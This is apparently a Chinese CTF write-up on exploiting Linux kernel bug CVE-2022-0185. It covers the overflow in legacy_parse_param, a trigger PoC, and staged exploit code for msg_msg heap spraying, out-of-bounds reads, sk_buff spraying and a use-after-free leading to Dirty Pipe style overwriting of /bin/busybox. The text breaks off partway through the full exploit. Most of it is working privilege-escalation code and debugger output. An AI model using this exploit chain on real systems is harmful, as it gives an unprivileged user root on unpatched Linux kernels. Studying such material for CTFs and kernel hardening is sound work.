0%

Dirty Pipe+CVE-2022-0185

CVE-2022-0185

1
Linux version 5.11.16 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #2 SMP Thu Nov 30 11:43:05 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
# Boot the challenge kernel (bzImage) with rootfs.cpio as the initrd and 256M of RAM.
# Mitigations in effect: SMEP and SMAP through the CPU model flags, KASLR and PTI
# through the kernel command line.
# oops=panic panic=1 together with -no-reboot: presumably a kernel oops ends the
# VM run instead of rebooting it - TODO confirm.
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/sh
# Guest init script: mounts the pseudo filesystems, locks down the flag file,
# restricts kernel information leaks and then hands an unprivileged shell to the user.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# The flag is owned by root and readable by its owner only.
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

# Restrict kernel pointer exposure and dmesg access.
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

# Interactive shell running as uid 1000.
setsid /bin/cttyhack setuidgid 1000 /bin/sh

# Runs once the shell above exits.
umount /proc
umount /sys

漏洞分析

在漏洞分析开始前需要先了解一下 mount 系统调用:

1
2
3
#include <sys/mount.h>

int mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data);
  • mount 系统调用被用以将文件系统挂载到以 / 为根节点的文件树上

之后有人为 mount 创建了一套更符合 “Linux 一切皆文件” 的 API:

1
2
3
#include <sys/mount.h>

/*
 * Open a filesystem type by name and return a file descriptor that refers to
 * a new filesystem context. Takes the filesystem name and a flags word,
 * matching the two-argument wrapper used by the PoC later in this document.
 */
int fsopen(const char *fs_name, unsigned int flags);
  • fsopen 系统调用则用于打开一个文件系统,并提供一个 “文件系统描述符”(被称为文件系统上下文 filesystem context)

文件系统描述符在内核中的结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Kernel-side filesystem context: the object behind the descriptor returned
 * by fsopen(). The field this write-up cares about is fs_private, which holds
 * the filesystem-specific context.
 */
struct fs_context {
const struct fs_context_operations *ops;
struct mutex uapi_mutex; /* Userspace access mutex */
struct file_system_type *fs_type;
void *fs_private; /* The filesystem's context */
void *sget_key;
struct dentry *root; /* The root and superblock */
struct user_namespace *user_ns; /* The user namespace for this mount */
struct net *net_ns; /* The network namespace for this mount */
const struct cred *cred; /* The mounter's credentials */
struct p_log log; /* Logging buffer */
const char *source; /* The source name (eg. dev path) */
void *security; /* Linux S&M options */
void *s_fs_info; /* Proposed s_fs_info */
unsigned int sb_flags; /* Proposed superblock flags (SB_*) */
unsigned int sb_flags_mask; /* Superblock flags that were changed */
unsigned int s_iflags; /* OR'd with sb->s_iflags */
unsigned int lsm_flags; /* Information flags from the fs to the LSM */
enum fs_context_purpose purpose:8;
enum fs_context_phase phase:8; /* The phase the context is in */
bool need_free:1; /* Need to call ops->free() */
bool global:1; /* Goes into &init_user_ns */
bool oldapi:1; /* Coming from mount(2) */
};
  • 核心条目就是 fs_context->fs_private

fsopen 打开一个文件系统后,可以使用 fsconfig 对该文件系统进行配置

1
2
3
#include <sys/mount.h>

/*
 * Configure a filesystem context obtained from fsopen(). cmd selects the
 * operation (for example FSCONFIG_SET_STRING); key, value and aux are
 * interpreted according to cmd. This matches the five-argument wrapper used
 * by the PoC later in this document.
 */
int fsconfig(int fd, unsigned int cmd, const char *key, const void *value, int aux);

若我们给的 cmd 为 FSCONFIG_SET_STRING,则在内核中存在如下调用链:

1
fsconfig -> vfs_fsconfig_locked -> vfs_parse_fs_param

接着就会在 vfs_parse_fs_param 中调用 fs_context->ops->parse_param 函数指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/*
 * Dispatch one configuration parameter for a filesystem context (excerpt; the
 * tail of the function is elided in this listing).
 *
 * The parameter is offered in turn to vfs_parse_sb_flag(), to the LSM hook
 * security_fs_context_parse_param() and, if the context provides one, to
 * fc->ops->parse_param(). Any stage that returns something other than
 * -ENOPARAM ends the dispatch with that value.
 */
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
int ret;

if (!param->key)
return invalf(fc, "Unnamed parameter\n");

ret = vfs_parse_sb_flag(fc, param->key);
if (ret != -ENOPARAM)
return ret;

ret = security_fs_context_parse_param(fc, param);
if (ret != -ENOPARAM)
/* Param belongs to the LSM or is disallowed by the LSM; so
* don't pass to the FS.
*/
return ret;

/* Filesystem-specific handler; for legacy contexts this is legacy_parse_param. */
if (fc->ops->parse_param) {
ret = fc->ops->parse_param(fc, param);
if (ret != -ENOPARAM)
return ret;
}

......

}
EXPORT_SYMBOL(vfs_parse_fs_param);

对于未设置 init_fs_context 的文件系统类型而言其最终会调用 legacy_init_fs_context 进行初始化,其中 fs_context->ops 会被设置为 legacy_fs_context_ops:(其 parse_param 指针对应为 legacy_parse_param 函数)

1
2
3
4
5
6
7
8
/*
 * Initialise a context for a filesystem type without its own init_fs_context:
 * allocates a zeroed struct legacy_fs_context as fc->fs_private and installs
 * legacy_fs_context_ops. Returns 0, or -ENOMEM if the allocation fails.
 */
static int legacy_init_fs_context(struct fs_context *fc)
{
fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL);
if (!fc->fs_private)
return -ENOMEM;
fc->ops = &legacy_fs_context_ops;
return 0;
}

漏洞就发生在 legacy_parse_param 函数中,在 ctx 中维护一个大小为 PAGE_SIZE 的 buffer 叫做 legacy_data,作用通常是为了存储和处理数据

1
2
3
4
5
/* Per-context state of the legacy parameter parser. */
struct legacy_fs_context {
char *legacy_data; /* address of the option buffer */
size_t data_size; /* number of bytes already copied into the buffer */
enum legacy_fs_param param_type;
};
  • 通常来说 data_size 必须小于 PAGE_SIZE,但漏洞会导致其大于 PAGE_SIZE 发生溢出
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/*
 * Append one "key" or "key=value" option, preceded by a comma, to the
 * PAGE_SIZE buffer ctx->legacy_data (excerpt; the code that computes len is
 * elided in this listing). This is the function containing the bug: the
 * bounds check below can be bypassed.
 */
static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
struct legacy_fs_context *ctx = fc->fs_private;
unsigned int size = ctx->data_size;
size_t len = 0;

......

/* size: bytes already copied; len: bytes about to be copied */
if (len > PAGE_SIZE - 2 - size) /* unsigned arithmetic: once size > PAGE_SIZE - 2 the subtraction wraps around to a huge value and the check always passes */
return invalf(fc, "VFS: Legacy: Cumulative options too large");
if (strchr(param->key, ',') ||
(param->type == fs_value_is_string &&
memchr(param->string, ',', param->size)))
return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
param->key);
if (!ctx->legacy_data) { /* first use: allocate ctx->legacy_data, PAGE_SIZE bytes */
ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
if (!ctx->legacy_data)
return -ENOMEM;
}

ctx->legacy_data[size++] = ',';
len = strlen(param->key);
memcpy(ctx->legacy_data + size, param->key, len); /* writes past the end of ctx->legacy_data when the check was bypassed */
size += len;
if (param->type == fs_value_is_string) {
ctx->legacy_data[size++] = '=';
memcpy(ctx->legacy_data + size, param->string, param->size); /* writes past the end of ctx->legacy_data when the check was bypassed */
size += param->size;
}
ctx->legacy_data[size] = '\0';
ctx->data_size = size;
ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
return 0;
}
  • 如果 size + 2 的值大于 PAGE_SIZE,无符号减法 PAGE_SIZE - 2 - size 会发生回绕变成一个极大的值,导致溢出检查失效,从而使 len 可以大于缓冲区的剩余空间,进而在 ctx->legacy_data 上发生溢出
  • 为了触发漏洞,size 必须大于 4094(即 PAGE_SIZE - 2);而在检查仍然有效时,size 最多只能累积到 4095,因此触发前 size 只能为 4095(下面的 PoC 中:255 × 16 + 15 = 4095)

漏洞 Poc 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>

#include "kernelpwn.h"

/* Raw fsopen(2) system call: opens the filesystem type fs_name and returns
 * the syscall result narrowed to int. */
int fsopen(const char *fs_name, unsigned int flags){
    long rc = syscall(__NR_fsopen, fs_name, flags);

    return rc;
}

/* Raw fsconfig(2) system call: forwards all five arguments unchanged and
 * returns the syscall result narrowed to int. */
int fsconfig(int fsfd, unsigned int cmd,
             const char *key, const void *val, int aux){
    long rc = syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);

    return rc;
}

/*
 * Proof of concept: fills the legacy option buffer of an ext4 context to
 * 4095 bytes (255 * 16 + 15), after which the bounds check in
 * legacy_parse_param no longer limits further writes.
 *
 * err_exit() comes from kernelpwn.h and is used exactly as the original code
 * used it; presumably it prints the message and exits - confirm against that
 * header.
 */
int main(int argc, char **argv, char **envp){
    int fs_fd;

    /* fsopen() needs to run inside the new user namespace; report a failure
     * here instead of letting fsopen() fail later with a less helpful error. */
    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) < 0) {
        err_exit("FAILED to unshare()!");
    }

    fs_fd = fsopen("ext4", 0);
    if (fs_fd < 0) {
        err_exit("FAILED to fsopen()!");
    }

    /* Each call appends ",aaaaaaa=bbbbbbb" (16 bytes). */
    for (int i = 0; i < 255; i++) {
        fsconfig(fs_fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
    }
    sleep(2);
    /* Appends ",cccccccc=ddddd" (15 bytes), bringing the total to 4095. */
    fsconfig(fs_fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

    return 0;
}

入侵思路

出现堆溢出的 slab 是 kmalloc-4k,可以使用自写管道完成提权,但这里使用 Dirty Pipe 的方法(直接修改它的 flags)

首先我们调用 fsopen 并准备好堆溢出:

1
2
3
4
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

然后大量分配如下的 msg:

  • 一个 0x1000 的 struct msg_msg
  • 一个 0x400 的 struct msg_msgseg

那样就有机会使 legacy_data - 0x1000,msg_msg - 0x1000,msg_msgseg - 0x400 物理连续

1
2
3
|page1-------|page2----|page3-----------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgsegB][...][...]
|0x1000------|0x1000---|0x400-------|0x400------|-- ... --|
  • 伙伴系统分配的伙伴页物理地址连续,但不能确定 msg_msgsegB 一定是 msg_msgseg 结构体

然后使用堆溢出来修改 msg_msg.m_ts,读取后续的 msg_msgsegB 并确定该区域为 msg_msgseg 结构体(否则就重新堆喷):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
char buff[0x1000];
logd("[*] prepare fsconfig heap overflow\n"); /* 准备堆溢出(使后续调用的fsconfig触发堆溢出) */
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0); /* 触发堆溢出 */

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}

在触发堆溢出的地方断点,打印数据如下:

1
2
3
4
0xffffffff8121f18f <legacy_parse_param+527>    call   memcpy            <memcpy>
dest: 0xffff888004a0b001 ◂— 0xc0ffff888004978e
src: 0xffff888003707780 ◂— 0x3130303030303030 ('00000001')
n: 0x19
1
2
3
4
5
6
7
8
20:0100│ rdi-1 0xffff888004a0b000 —▸ 0xffff888004978e3d ◂— 0x0
21:0108│       0xffff888004a0b008 —▸ 0xffff888004978ec0 —▸ 0xffff888004a0b000 —▸ 0xffff888004978e3d ◂— 0x0
22:0110│       0xffff888004a0b010 ◂— 0x41 /* 'A' */
23:0118│       0xffff888004a0b018 ◂— 0x13c8
24:0120│       0xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:0128│       0xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
26:0130│       0xffff888004a0b030 ◂— 0x13371337
27:0138│       0xffff888004a0b038 ◂— 0x5151515151515151 ('QQQQQQQQ')
1
2
3
4
5
6
20:0100│ rax-1 rdi-1 0xffff888004a0b000 ◂— 0x303030303030303d ('=0000000')
21:0108│             0xffff888004a0b008 ◂— 0x3131313131313131 ('11111111')
22:0110│             0xffff888004a0b010 ◂— 0x3232323232323232 ('22222222')
23:0118│             0xffff888004a0b018 ◂— 0x17c8
24:0120│             0xffff888004a0b020 —▸ 0xffff8880049e7000 ◂— 0x0
25:0128│             0xffff888004a0b028 —▸ 0xffff888004b619d8 ◂— 0x1
  • 可以发现 msg_msg.m_ts 被扩大,使其可以向后溢出泄露地址

当我们确定 msg_msgsegB 为一个 msg_msgseg 结构体后,就可以将除了 msg_msgsegA 的所有 msg_msgseg 都释放掉,然后用 0x400 的 msg_msg 进行堆喷占位:

1
2
3
|page1-------|page2----|page3---------------------------|
[legacy_data][msg_msgA][msg_msgsegA][free slob][...][...]
|0x1000------|0x1000---|0x400-------|0x400----|-- ... --|
1
2
3
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
  • 这里假设命中 free slob 的 msg_msg 结构体为 msg_msgB

接着就可以泄露 msg_msgB 各个条目的信息了,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1(); /* msg_msgA的m_type已经被修改,因此不会释放msg_msgA和msg_msgsegA */

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

目前的堆布局如下:

1
2
3
4
5
6
|page1-------|page2----|page3--------------------------|
[legacy_data][msg_msgA][msg_msgsegA][msg_msgB][...][...]
|0x1000------|0x1000---|0x400-------|0x400---|-- ... --|
||-(prev)->msg_msgC(地址泄露)
||-(next)->msg_msgD
0x400:msg_msgC->msg_msgB->msg_msgD
  • 通过 msg_msgB 已经泄露了 msg_msgC 的地址,这个 msg 后面会被拿来做 UAF

接下来就可以将 msg_msgD 以及其后的 msg_msg 都释放掉,重新申请一个 msg_msgX,这样X的地址就会写到 msg_msgB 的 next 指针处

  • 受限于场景,需要在 msg_msgX 中部署一个 fake msg_msg,让伪造 msg_msg->next 指向 msg_msgC(后续利用会需要)

接着再次使用 OOB read,就能知道 msg_msgX 的地址,部分脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
logd("[*] alloc msg_msg as heap buffer with known address\n");
{
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT); /* 释放msg_msgD以及其后的msg_msg */
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr; /* 填写msg_msgC(在上一步中泄露) */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
/* 申请msg_msgX(msg_msgX的地址将会写在msg_msgB->next处) */
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg); /* 泄露msg_msgX的地址,而这里的heap_buffer_addr记录的是fake msg_msg的地址 */
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

再次调用 fsopen 准备好堆溢出,这一次修改 m_list.next 使其指向之前部署的 fake msg_msg(而 fake msg_msg->next 则是指向已知地址的 msg_msgC)

接着,将 msg_msgB 从正常的 msg 队列中取出,再堆喷 sk_buff->data 占用 msg_msgB 的空间:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr; /* 修改next指针为fake msg_msg */
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spary skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140); /* 利用sk_buff进行占位 */
}

尝试释放 fake msg_msg,就会得到一个 UAF slob:

1
2
3
4
5
6
7
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

最后再往 UAF slob 中堆喷 pipe_buffer,利用 sk_buff 修改 pipe_buffer->flags,之后的步骤就和 DirtyPipe 一样了(往 /bin/busybox 中写入 shellcode)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

#define logd(fmt, ...) fprintf(stderr, (fmt), ##__VA_ARGS__)
#define NUM_MSQIDS_1 (0x400)
#define NUM_MSQIDS_2 (0x400)
#define MSG_A_RAW_SIZE (0x1400 - 0x8)
#define MSG_A_BUFF_SIZE (MSG_A_RAW_SIZE - sizeof(struct msg_msg))
#define MSG_B_RAW_SIZE (0x400)
#define MSG_B_BUFF_SIZE (MSG_B_RAW_SIZE - sizeof(struct msg_msg))
#define MTYPE_A (0x41)
#define MTYPE_B (0x42)
#define MTYPE_FAKE (0x43)
#define MSG_SIG (0x13371337)
#define NUM_PIPES (0x100)
#define NUM_SOCKETS (4)
#define NUM_SKBUFFS (0x80)

/* Doubly linked list node; both links are stored as raw 64-bit values so
 * that leaked addresses can be read and written as integers. */
struct list_head {
uint64_t next;
uint64_t prev;
};

/* User-space view of a message header as it is read back from, or written
 * into, kernel memory: six 64-bit fields (0x30 bytes) followed by the text. */
struct msg_msg {
struct list_head m_list; /* queue links */
uint64_t m_type; /* message type */
uint64_t m_ts; /* message text size */
uint64_t next; /* link to the following segment */
uint64_t security;
char mtext[0]; /* message text starts here */
};

/* Header of a message continuation segment: a single 8-byte link. */
struct msg_msgseg {
uint64_t next;
};

/* msgsnd()/msgrcv() buffer for the large "A" messages: a type field followed
 * by MSG_A_BUFF_SIZE bytes of text. */
struct typ_msg_a {
long mtype;
char mtext[MSG_A_BUFF_SIZE];
};

/* Receive buffer 0x400 bytes larger than struct typ_msg_a, used when reading
 * a message whose size field was enlarged. */
struct typ_msg_a_oob {
long mtype;
char mtext[MSG_A_BUFF_SIZE + 0x400];
};

/* msgsnd()/msgrcv() buffer for the small "B" messages: a type field followed
 * by MSG_B_BUFF_SIZE bytes of text. */
struct typ_msg_b {
long mtype;
char mtext[MSG_B_BUFF_SIZE];
};

unsigned char elfcode[] = {
